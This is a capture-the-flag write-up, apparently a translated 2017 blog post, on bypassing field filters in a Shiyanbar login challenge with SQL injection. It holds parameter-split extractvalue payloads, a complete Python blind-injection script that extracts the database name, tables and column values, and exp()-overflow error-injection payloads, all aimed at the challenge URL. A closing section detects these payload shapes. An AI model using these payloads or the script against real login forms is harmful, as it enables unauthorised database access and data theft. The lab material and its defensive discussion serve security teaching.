NEKO

Shiyanbar: error-based injection with extra ingredients (加了料的报错注入)

2017/12/28

http://ctf5.shiyanbar.com/web/baocuo/index.php

and, or, regexp, ', /, *, and so on are all unfiltered.
In fact, username filters (), and password filters the error-reporting functions.

HTTP parameter split injection

username=' or extractvalue/*&password=*/(1,concat(0x7e,(select database()),0x7e)) or '

Boolean-based blind injection

The password field can be blind-injected.

The blind injection has pitfalls.
First, the character set has to be written like this:
dic='!_{}@~'+string.ascii_letters+string.digits+'.'
'.' must be placed last, because '.' matches any character; if '.' turns up as a match, it means the real character is a symbol not in the character set.
There must be no '+', otherwise the response is repetition-operator operand invalid' from regexp
Here the special symbols have to come first, because the database name is error_based_hpf, which contains 'or'. When probing the character after 'or', since this uses regexp, if 'd' is tried before '_' the prefix becomes 'ord', and 'ord' is filtered, so error_status is no longer 'Login failed'. Alternatively, 'Sql injection detected' can be used as a second decision condition.
Of course you can also find correct_status; two methods are given here:

username=\&password=or 1 regexp 1 or '
username=&password=' or (select database() regexp 'e') or '
(the earlier blind injection could already see the first few characters of the database name)

Of course, changing the character set is enough to get it done.

PoC:

import requests
import string

# Character set for the regexp oracle: special symbols first (so "or" is never
# extended into the filtered keyword "ord"), "." last because it matches any
# character, and no "+" because the regexp engine rejects it.
dic = '!_{}@~' + string.ascii_letters + string.digits + '.'
error_status = 'Login failed'

proxies = {
    "http": None,
    "https": None,
}
url = 'http://ctf5.shiyanbar.com/web/baocuo/index.php'


def crackdatabase():
    # Extend the known prefix one character at a time; a response that does
    # not contain error_status means regexp '^prefix' matched.
    strs = ''
    for i in range(40):
        for j in dic:
            data = {"username": '',
                    "password": "'or ((select database()) regexp '^%s') or '" % (strs + j)}
            r = requests.session().post(url=url, data=data, proxies=proxies).text
            if error_status not in r:
                strs += j
                print(strs)
                break
    # result: error_based_hpf


def cracktable():
    strs = ''
    for i in range(40):
        for j in dic:
            data = {"username": '',
                    "password": "'or ((select group_concat(table_name separator '@') from information_schema.tables where table_schema regexp database()) regexp '^%s') or '" % (strs + j)}
            r = requests.session().post(url=url, data=data, proxies=proxies).text
            if error_status not in r:
                strs += j
                print(strs)
                break
    # result: ffll44jj@users


def crackcolumn():
    strs = ''
    for i in range(40):
        for j in dic:
            data = {"username": '',
                    "password": "'or ((select group_concat(column_name separator '@') from information_schema.columns where table_name regexp 'ffll44jj') regexp '^%s') or '" % (strs + j)}
            r = requests.session().post(url=url, data=data, proxies=proxies).text
            if error_status not in r:
                strs += j
                print(strs)
                break
    # result: value


def dump():
    strs = ''
    for i in range(40):
        for j in dic:
            data = {"username": '',
                    "password": "'or ((select group_concat(value separator '@') from ffll44jj) regexp '^%s') or '" % (strs + j)}
            r = requests.session().post(url=url, data=data, proxies=proxies).text
            if error_status not in r:
                strs += j
                print(strs)
                break
    # result: flag{err0r_b4sed_sqli_._hpf}  (the "." was guessed to be "+")


if __name__ == '__main__':
    crackdatabase()
    cracktable()
    crackcolumn()
    dump()

exp error-based injection

However, the right-hand side (the password field) does not filter exp.
exp-based error injection works on SQL versions 5.5.5 and above.
PoC:

username=&password='or exp(~(select*from(select database())x)) or '

username=&password='or exp(~(select*from(select group_concat(table_name separator '@') from information_schema.tables where table_schema regexp database())x)) or '

username=&password='or exp(~(select*from(select group_concat(column_name separator '@') from information_schema.columns where table_name regexp 'ffll44jj')x)) or '

username=&password='or exp(~(select*from(select group_concat(value) from ffll44jj)x)) or '
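From the defender's side, the lesson of this writeup is that per-field keyword filters fail because the back end concatenates both fields into one statement: a block comment opened in username and closed in password joins them, and the other two techniques (regexp oracle, exp() overflow) live entirely in one field. The following is an added example (not the author's code) that reassembles the statement before inspecting it, run over constructed form bodies shaped like the three payload families above; the tag names and field names are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample bodies (not captured traffic), shaped like the payloads
# discussed in the writeup: comment split across fields, regexp boolean
# oracle, and exp()/bigint-overflow error-based injection.
SAMPLE_BODIES = [
    "username=admin&password=secret",
    "username=' or extractvalue/*&password=*/(1,concat(0x7e,(select database()),0x7e)) or '",
    "username=&password=' or ((select database()) regexp '^e') or '",
    "username=&password='or exp(~(select*from(select database())x)) or '",
]

ERROR_FUNC = re.compile(r"\b(?:extractvalue|updatexml|exp)\s*\(", re.I)
REGEXP_ORACLE = re.compile(r"\bregexp\s*'\^", re.I)
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def classify(body):
    """Return the sorted list of injection indicators found in a form body."""
    fields = parse_qs(body, keep_blank_values=True)
    user = fields.get("username", [""])[0]
    pw = fields.get("password", [""])[0]
    findings = set()

    # A comment opened in one field and closed in the other is valid SQL once
    # the server interpolates both values, even though each field on its own
    # passes its filter (no "(" in username, no error function in password).
    if "/*" in user and "*/" in pw:
        findings.add("comment-split")

    # Inspect the reassembled statement with comments stripped, which is what
    # the database actually parses; per-field checks never see this form.
    joined = BLOCK_COMMENT.sub(" ", user + " " + pw)
    if ERROR_FUNC.search(joined):
        findings.add("error-function")
    if REGEXP_ORACLE.search(joined):
        findings.add("regexp-oracle")
    return sorted(findings)


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(classify(body) or "clean", "<-", body)
```

The real fix is a parameterised query, which makes the field contents data rather than SQL; the classifier above only shows why filtering fields independently cannot be relied on.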

Author: n3k0

Published: December 28th 2017, 12:59:42

Roar: no Mahoyo 2 to play, I'm dying
